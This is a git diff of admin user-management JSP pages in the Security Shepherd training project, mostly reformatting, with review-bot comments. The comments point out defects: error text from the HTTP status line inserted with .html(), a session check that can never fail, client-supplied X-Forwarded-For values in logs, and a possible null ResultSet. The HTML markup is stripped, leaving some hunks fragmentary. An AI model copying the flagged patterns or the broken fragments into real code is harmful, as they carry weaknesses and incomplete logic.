+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+String ApplicationRoot = getServletContext().getRealPath("");
+boolean showClasses = false;
- ResultSet classList = Getter.getClassInfo(ApplicationRoot);
- try {
- showClasses = classList.next();
- } catch (SQLException e) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
- showClasses = false;
- }
+ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+try
+{
+ showClasses = classList.next();
+}
+catch(SQLException e)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+ showClasses = false;
+}
%>
-
Add Players
-
-
-
-
-
Loading...
-
-
+
Add Players
+
+
+
+
+
Loading...
+
+
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+ $("#theForm").submit(function(){
+ //Get Data
+ var theClass = $("#classId").val();
+ var theUserName = $("#userName").attr('value');
+ var thePassWord = $('#passWord').attr('value');
+ var thePassWordConfirm = $('#passWordConfirm').attr('value');
+ var theUserAddress = $('#userAddress').attr('value');
+ var theUserAddressCnf = $('#userAddressCnf').attr('value');
+ var theCsrfToken = $('#csrfToken').attr('value');
+ //Validation
+ if (theUserName.length == 0 ||
+ thePassWord.length == 0 ||
+ thePassWordConfirm.length == 0)
+ {
+ $('#badData').html("
Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "
");
+ $("#badData").show("slow");
+ }
+ $("#createUserDiv").slideDown("slow");
+ });
+ });
+ }
+ });
+
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
<% } %>
<%
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
\ No newline at end of file
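Review bot: The submit handler reads the class with `$("#classId").val()` but reads the user name, both password fields, both address fields and the CSRF token with `.attr('value')`, which on jQuery 1.9 and later returns the markup attribute rather than what was typed (the jQuery version in use is not visible here). Using `.val()` throughout, e.g. `var thePassWord = $('#passWord').val();`, keeps the length checks and the submitted values consistent. Those length checks run only in the browser, so the servlet that receives the form still has to enforce the same rules. The handler's body is only partly visible in this hunk.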
diff --git a/src/main/webapp/admin/userManagement/assignPlayers.jsp b/src/main/webapp/admin/userManagement/assignPlayers.jsp
index 9fae05108..467a65df0 100644
--- a/src/main/webapp/admin/userManagement/assignPlayers.jsp
+++ b/src/main/webapp/admin/userManagement/assignPlayers.jsp
@@ -1,234 +1,268 @@
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
- language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
- errorPage="" %>
+ language="java"
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: assignPlayers.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: assignPlayers.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
+
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
//Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(assignPlayers.jsp): tokenCookie Error:" + htmlE.toString());
- }
+Cookie tokenCookie = null;
+try
+{
+ tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(assignPlayers.jsp): tokenCookie Error:" + htmlE.toString());
+}
// validateAdminSession ensures a valid session, and valid administrator credentials
// Also, if tokenCookie != null, then the page is good to continue loading
// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
- //Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
- // Getting Session Variables
- //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
- String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
- String userName = Encode.forHtml(ses.getAttribute("userName").toString());
- String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
- String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
- String ApplicationRoot = getServletContext().getRealPath("");
- boolean showClasses = false;
-
- ResultSet classList = Getter.getClassInfo(ApplicationRoot);
- try {
- showClasses = classList.next();
- } catch (SQLException e) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
- showClasses = false;
- }
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+ //Logging Username
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ // Getting Session Variables
+ //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+
+ String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+ String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+ String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+ String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+ String ApplicationRoot = getServletContext().getRealPath("");
+ boolean showClasses = false;
+
+ ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+ try
+ {
+ showClasses = classList.next();
+ }
+ catch(SQLException e)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+ showClasses = false;
+ }
%>
Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "
");
+ $("#badData").show("slow");
+ }
+ $("#createUserDiv").slideDown("slow");
+ });
+ });
+ }
+ });
+
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
<% } %>
<%
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
\ No newline at end of file
diff --git a/src/main/webapp/admin/userManagement/createNewClass.jsp b/src/main/webapp/admin/userManagement/createNewClass.jsp
index fe14cb6ce..50a97d573 100644
--- a/src/main/webapp/admin/userManagement/createNewClass.jsp
+++ b/src/main/webapp/admin/userManagement/createNewClass.jsp
@@ -1,140 +1,159 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="java.sql.*, java.util.Calendar, java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
+ import="java.sql.*, java.util.Calendar, java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: createNewClass.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: createNewClass.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
+
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
//Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(createNewClass.jsp): tokenCookie Error:" + htmlE.toString());
- }
+Cookie tokenCookie = null;
+try
+{
+ tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(createNewClass.jsp): tokenCookie Error:" + htmlE.toString());
+}
// validateAdminSession ensures a valid session, and valid administrator credentials
// Also, if tokenCookie != null, then the page is good to continue loading
// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
- //Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+ //Logging Username
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
// Getting Session Variables
//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
- String userName = Encode.forHtml(ses.getAttribute("userName").toString());
- String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
- String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
- String ApplicationRoot = getServletContext().getRealPath("");
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+String ApplicationRoot = getServletContext().getRealPath("");
%>
-
Create New Class
-
-
-
-
-
Loading...
-
-
+
Create New Class
+
+
+
+
+
Loading...
+
+
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+ $("#theForm").submit(function(){
+ //Get Data
+ var theClassName = $("#className").attr('value');
+ var theClassYear = $('#classYear').attr('value');
+ var theCsrfToken = $('#csrfToken').attr('value');
+ //Validation
+ if (theClassName.length == 0 || theClassYear.length == 0)
+ {
+ $('#badData').html("
Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "
");
+ $("#badData").show("slow");
+ }
+ $("#downgradeDiv").slideDown("slow");
+ });
+ });
+ }
+ });
+
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
<% } %>
<%
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
\ No newline at end of file
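Review bot: The line that concatenates `ajaxCall.status` and `ajaxCall.statusText` into the "Sorry but there was an error" message appears to feed `$('#badData').html(...)`, so text taken from the HTTP response status line is parsed as markup rather than displayed as text. The opener of that call is lost in this view, but `.html("` is used on `#badData` earlier in the same `#theForm` submit handler, and the scriptlet's own comment asks for encoding everywhere. I would write the message with `$('#badData').text("Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText);`, or encode the two values before concatenating if the wrapper markup has to stay. The same concatenation is in the givePoints.jsp, suspendUser.jsp and unSuspendUser.jsp hunks.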
diff --git a/src/main/webapp/admin/userManagement/givePoints.jsp b/src/main/webapp/admin/userManagement/givePoints.jsp
index de85cf9e2..6a8ec259f 100644
--- a/src/main/webapp/admin/userManagement/givePoints.jsp
+++ b/src/main/webapp/admin/userManagement/givePoints.jsp
@@ -1,212 +1,241 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
- errorPage="" %>
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: givePoints.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: givePoints.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
+
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
//Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(givePoints.jsp): tokenCookie Error:" + htmlE.toString());
- }
+Cookie tokenCookie = null;
+try
+{
+ tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(givePoints.jsp): tokenCookie Error:" + htmlE.toString());
+}
// validateAdminSession ensures a valid session, and valid administrator credentials
// Also, if tokenCookie != null, then the page is good to continue loading
// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
//Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
// Getting Session Variables
//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
- String userName = Encode.forHtml(ses.getAttribute("userName").toString());
- String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
- String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
- String ApplicationRoot = getServletContext().getRealPath("");
- boolean showClasses = false;
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+String ApplicationRoot = getServletContext().getRealPath("");
+boolean showClasses = false;
- ResultSet classList = Getter.getClassInfo(ApplicationRoot);
- try {
- showClasses = classList.next();
- } catch (SQLException e) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
- showClasses = false;
- }
+ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+try
+{
+ showClasses = classList.next();
+}
+catch(SQLException e)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+ showClasses = false;
+}
%>
Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "
");
+ $("#badData").show("slow");
+ }
+ $("#updatePointsDiv").slideDown("slow");
+ });
+ });
+ }
+ });
+
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
<% } %>
<%
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
\ No newline at end of file
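Review bot: The outer guard `if (request.getSession() != null)` can never be false, because the no-argument `getSession()` creates a session when none exists, so the final `else` redirect to `loggedOutSheep.html` is unreachable. Access control still rests on `Validate.validateAdminSession`, so this is not a bypass, but the check reads as a gate it does not provide and every anonymous hit on this admin page allocates a session. I would use `HttpSession ses = request.getSession(false);` followed by `if (ses != null)`. The page directive would also need `session="false"`, since without it the container creates the session implicitly. The same opening is in the createNewClass.jsp, setDefaultClassForRegistration.jsp, suspendUser.jsp, unSuspendUser.jsp and upgradePlayers.jsp hunks.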
diff --git a/src/main/webapp/admin/userManagement/setDefaultClassForRegistration.jsp b/src/main/webapp/admin/userManagement/setDefaultClassForRegistration.jsp
index 135c75420..a9baef050 100644
--- a/src/main/webapp/admin/userManagement/setDefaultClassForRegistration.jsp
+++ b/src/main/webapp/admin/userManagement/setDefaultClassForRegistration.jsp
@@ -1,159 +1,181 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: setDefaultClassForRegistration.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: setDefaultClassForRegistration.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
+
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
//Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(setDefaultClassForRegistration.jsp): tokenCookie Error:" + htmlE.toString());
- }
+Cookie tokenCookie = null;
+try
+{
+ tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(setDefaultClassForRegistration.jsp): tokenCookie Error:" + htmlE.toString());
+}
// validateAdminSession ensures a valid session, and valid administrator credentials
// Also, if tokenCookie != null, then the page is good to continue loading
// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
- //Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+ //Logging Username
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
// Getting Session Variables
//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
- String userName = Encode.forHtml(ses.getAttribute("userName").toString());
- String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
- String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
- String ApplicationRoot = getServletContext().getRealPath("");
- boolean showClasses = false;
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+String ApplicationRoot = getServletContext().getRealPath("");
+boolean showClasses = false;
- ResultSet classList = Getter.getClassInfo(ApplicationRoot);
- try {
- showClasses = classList.next();
- } catch (SQLException e) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
- showClasses = false;
- }
+ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+try
+{
+ showClasses = classList.next();
+}
+catch(SQLException e)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+ showClasses = false;
+}
%>
-
Set Default Registration Class
-
-
-
-
-
Loading...
-
-
+
Set Default Registration Class
+
+
+
+
+
Loading...
+
+
-
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
<% } %>
<%
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
\ No newline at end of file
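Review bot: Every `ShepherdLogManager.logEvent(...)` call in this scriptlet passes `request.getHeader("X-Forwarded-For")` through as an address, but that header is chosen by the client unless a trusted proxy overwrites it. Anyone reading these logs during an investigation could take a spoofed value for the real origin. `logEvent` is not visible here, so whether it bounds or escapes the value is an assumption to confirm. I would add a comment at the first call, `// X-Forwarded-For is client-supplied unless a trusted proxy sets it; recorded for reference, not attribution`, and have `logEvent` cap the length and strip control characters so all callers benefit. The other userManagement hunks in this commit log the header the same way.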
diff --git a/src/main/webapp/admin/userManagement/suspendUser.jsp b/src/main/webapp/admin/userManagement/suspendUser.jsp
index 07749a7ce..c4a99de66 100644
--- a/src/main/webapp/admin/userManagement/suspendUser.jsp
+++ b/src/main/webapp/admin/userManagement/suspendUser.jsp
@@ -1,204 +1,234 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
- errorPage="" %>
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: suspendUser.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: suspendUser.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
+
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
//Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(suspendUser.jsp): tokenCookie Error:" + htmlE.toString());
- }
+Cookie tokenCookie = null;
+try
+{
+ tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(suspendUser.jsp): tokenCookie Error:" + htmlE.toString());
+}
// validateAdminSession ensures a valid session, and valid administrator credentials
// Also, if tokenCookie != null, then the page is good to continue loading
// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
//Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
// Getting Session Variables
//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
- String userName = Encode.forHtml(ses.getAttribute("userName").toString());
- String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
- String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
- String ApplicationRoot = getServletContext().getRealPath("");
- boolean showClasses = false;
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+String ApplicationRoot = getServletContext().getRealPath("");
+boolean showClasses = false;
- ResultSet classList = Getter.getClassInfo(ApplicationRoot);
- try {
- showClasses = classList.next();
- } catch (SQLException e) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
- showClasses = false;
- }
+ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+try
+{
+ showClasses = classList.next();
+}
+catch(SQLException e)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+ showClasses = false;
+}
%>
Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "
");
+ $("#badData").show("slow");
+ }
+ $("#suspendDiv").slideDown("slow");
+ });
+ });
+ }
+ });
+
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
<% } %>
<%
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
\ No newline at end of file
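Review bot: `classList.next()` is guarded only by `catch(SQLException e)`, so a null return from `Getter.getClassInfo(ApplicationRoot)` would fail the request with an unhandled NullPointerException instead of taking the logged `showClasses = false` fallback. The body of `getClassInfo` is not visible here, so whether it can return null on a database failure needs confirming. If it can, `showClasses = classList != null && classList.next();` keeps the intended behaviour. Nothing in the visible lines closes `classList` either, so it is worth checking that the rest of the page releases it. The same block is in the givePoints.jsp, setDefaultClassForRegistration.jsp and unSuspendUser.jsp hunks.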
diff --git a/src/main/webapp/admin/userManagement/unSuspendUser.jsp b/src/main/webapp/admin/userManagement/unSuspendUser.jsp
index 3375c47d4..2f9dfae37 100644
